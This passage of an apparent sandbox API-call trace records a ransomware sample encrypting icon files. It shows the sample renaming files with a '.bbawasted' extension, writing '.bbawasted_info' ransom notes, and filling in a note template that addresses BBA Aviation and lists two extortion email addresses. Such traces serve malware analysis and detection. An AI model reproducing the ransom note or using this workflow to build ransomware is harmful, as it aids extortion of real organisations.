szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6ce0) returned 1 [0164.019] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0164.019] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0164.019] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 46 [0164.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6aecf0 [0164.020] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.020] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.020] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0164.020] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0164.020] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0164.020] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0164.021] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.022] SetEndOfFile (hFile=0x288) returned 1 [0164.023] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.023] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.bbawasted")) returned 1 [0164.041] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0164.041] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0164.042] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x37e [0164.042] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x640000 [0164.042] CloseHandle (hObject=0x28c) returned 1 [0164.045] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.045] CloseHandle (hObject=0x27c) returned 1 [0164.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0164.045] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0164.046] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0164.046] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0164.046] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0164.047] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0164.047] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0164.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a3670 [0164.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0164.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.057] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nbZzxSERPAxfnpkDU+Z9RAGA8iiLWwMGMVi3cJsaz/UgmyC0H7LYKzn5Yki4csiW\r\nbSSROG+WbFi1M0VUGZmhWwOl7WHilD0MzLzevD63BMbYotDOTxtClZnESZ5Rz1Wd\r\nkEI5Mohy5/xlwlto83k0fIKThag3megBdnGrpUlOtEzkfgup9rNLKiAco9OGvZD/\r\ngYqNB53ofUnU/2aitxcuhX2m8qaWKNZ/h+PYMOloQ9pHj5gtQefPQ81vKyyBbmhy\r\nkBIGHC+DKY1SaZKrodNHCb/elnGlFwFLVyl+Ca0xe+FjTFOXtNHOV/YHMpTDejok\r\nhdP0AYSKkx3E1jBzuKAGpFgm7YUKhbBTMhjdSWoU5A9kcAsamMAksugYOmYgqi+j\r\nadqo8BOhhQy1WW9nKNGUuyOXpgmKSreJMjKrTyVyVIzZjxqSP2GhsXuIEg2K7TIk\r\nEfTUQ0/iK+zccKqhpU1oEYG3qXk0obdnmpgjptseobVb9v+NkbN6Sm46ike3CFrS\r\ny+ngqG+XSzgiU0K+tAtTjOYHVqLwSpvdlLjL74jSwU6DxNHcw9tD0RJCSe4kGW2R\r\nkprd8/JnYUGf9rdlwDkMC2Xkolx3Fxn7yE8Nr4kGNYZebsmKltS/9Z4oTBW1LZHG\r\nF6qAFdtLSgzqNmHDUH81XeBDzTSHmlNGesKmGLrju7/=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0164.057] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0164.057] SetEndOfFile (hFile=0x288) returned 1 [0164.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.060] CloseHandle (hObject=0x288) returned 1 [0164.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0164.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3c30 | out: hHeap=0x660000) returned 1 [0164.064] _aulldvrm () returned 0x0 [0164.065] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0164.065] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0164.065] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.065] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 43 [0164.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x6aecf0 [0164.066] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.066] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.067] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0164.067] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0164.067] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0164.067] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0164.068] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.070] SetEndOfFile (hFile=0x288) returned 1 [0164.070] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.070] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.bbawasted")) returned 1 [0164.071] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0164.071] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0164.072] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x47e [0164.072] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x47e) returned 0x640000 [0164.072] CloseHandle (hObject=0x27c) returned 1 [0164.143] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.144] CloseHandle (hObject=0x28c) returned 1 [0164.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0164.149] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0164.150] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0164.150] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.150] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0164.151] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0164.151] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0164.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0164.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0164.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.163] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]USgpB+EfujBA42J5+TSnIMVuHQVR7zEi50eE3kyVtblXVWyvlzwilUxbkiG7DiuG\r\nEt3hBLZWfqZ+OLaSFo6dokoSKfrd/zJk4/u0S+9V1etMM9IzXq3cbHLRYnIqY5wh\r\nH9rfgQCpjDXqdsgtDVY7cK55TUBofXHH6zP8jA8xQgZcA3RXXjQjrDRbtapU/AiF\r\nIiRs6kgr6Ig3+Xfo1eLz5rMTuVn3S6JNiYTFaYvgwBqcsbiSxN2vEHnnTyJnQwQV\r\nGOyKFyYQLMLGdbRAjYz8vpA989RBt5RQTWgP6XObRw0ANmQ8jBCTmT8pOrFPNeS4\r\ndulAyy15YH+Ogf+jsm+/xsyU0aFBf9LW5b9DodoqDRDGgO0oWSc8ZcxmrqOoaTPq\r\nuOacNst0myPtjP78gXPfDwV7u/39c4uE6jnd7qh1eQieCNYfYdkC33wPiSqD7mr5\r\nbpmy0z43dkc72QbPXzoulpH2GjCDdaMK9mPuUet63vp20aerxO3UiwV0e+92yMKW\r\nWF9jrMb8WyXMDeVpEyQgF3svh8+6eo4PavXCCVq2fj1Jn6xp+hjzsBm+wNic00Nv\r\nqfQXXl3YDXtiyrJL3S6+ZBvgguwiLK2ZpggOIi4Lb2R2VmLQvTuITQFaj5L1mkjP\r\nB2PyeY37SvEbpt6RcrQKW4PddRHGnrepUMsXIN9/krd=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0164.163] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0164.164] SetEndOfFile (hFile=0x288) returned 1 [0164.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.166] CloseHandle (hObject=0x288) returned 1 [0164.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0164.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66e6e0 | out: hHeap=0x660000) returned 1 [0164.175] _aulldvrm () returned 0x0 [0164.175] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0164.176] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0164.176] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.176] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 43 [0164.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x6aecf0 [0164.176] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.176] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6708) returned 1 [0164.177] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0164.177] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.177] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0164.247] WriteFile (in: hFile=0x28c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.249] SetEndOfFile (hFile=0x28c) returned 1 [0164.249] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.249] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.bbawasted")) returned 1 [0164.250] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0164.250] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0164.250] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x2796 [0164.251] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2796) returned 0x640000 [0164.251] CloseHandle (hObject=0x288) returned 1 [0164.257] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.257] CloseHandle (hObject=0x27c) returned 1 [0164.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.258] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6020) returned 1 [0164.258] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.258] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0164.258] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0164.259] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0164.259] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0164.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6bc138 [0164.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.268] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]V6ML2HJcmKFHVmxsq6Q3CJHKyTtKFxn0OTmi+CtyPzZX0iXyTaTY71KtpIOjNs23\r\nwzuklZ8YJf7XrRJm1VllEGTzZcj19k7H64NbW1rpp1OHrNlfCH5brOrJpcnKxGwu\r\nmxTJf+a0ITFoYoITue+/0af1AQROziS6noJveHePnmoBu5Xyolg7NZROr/8kaGtm\r\n65woVdia4ZcpxGBcsiwZQot6wEEcbP3KGO+7Tbee4VX8nG4qSHK+xiIdAtox1l6b\r\nEZxayvuUhb3irfkySBj3mjq6zXbMkAFgM/ZD3BWXfXgbMFFWv/N12i2W3vFYwW52\r\nL5aADjGQR/ShX9KVj5rEnEM55GhqrNtnDDXChRL+uNarmpubWJeuWAXMNhQkgZtB\r\nRbcUYinxJhWSxofOU0BSIH9M6PP6GMv5vUuDw2pialjGyIrAus1FL9esjbhTylRW\r\ngKtzG33EgqTdL4DhEmNI216j6KdQjQDtetucm3yrShE9rMKtCDeGHE5uqZfaiZEP\r\nkeLcomVnumhouT3Zn4pr7EJR4cGOOLDZADCwAX7RC5JKwK30wlduTs4Owvef6YDi\r\ngdOMLByJB1SW56cca3+iv1sAcFihRARl6F5wmOetMOjdSiQNSYKdY9SQ3oEa1oYx\r\n4rmKiur6JfY7qCf3Zao+Tc4EaEikDVF/33XfpVjkfZH=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc138 | out: hHeap=0x660000) returned 1 [0164.268] WriteFile (in: hFile=0x28c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0164.269] SetEndOfFile (hFile=0x28c) returned 1 [0164.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.271] CloseHandle (hObject=0x28c) returned 1 [0164.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0164.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66e790 | out: hHeap=0x660000) returned 1 [0164.276] _aulldvrm () returned 0x0 [0164.276] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0164.277] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0164.277] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0164.277] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 51 [0164.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6aecf0 [0164.278] lstrcpyW (in: lpString1=0x6aed56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.278] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0164.278] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0164.278] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0164.279] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0164.280] WriteFile (in: hFile=0x28c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.281] SetEndOfFile (hFile=0x28c) returned 1 [0164.281] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.282] lstrcpyW (in: lpString1=0x6aed56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.bbawasted")) returned 1 [0164.319] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0164.320] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0164.320] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x47e [0164.320] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, 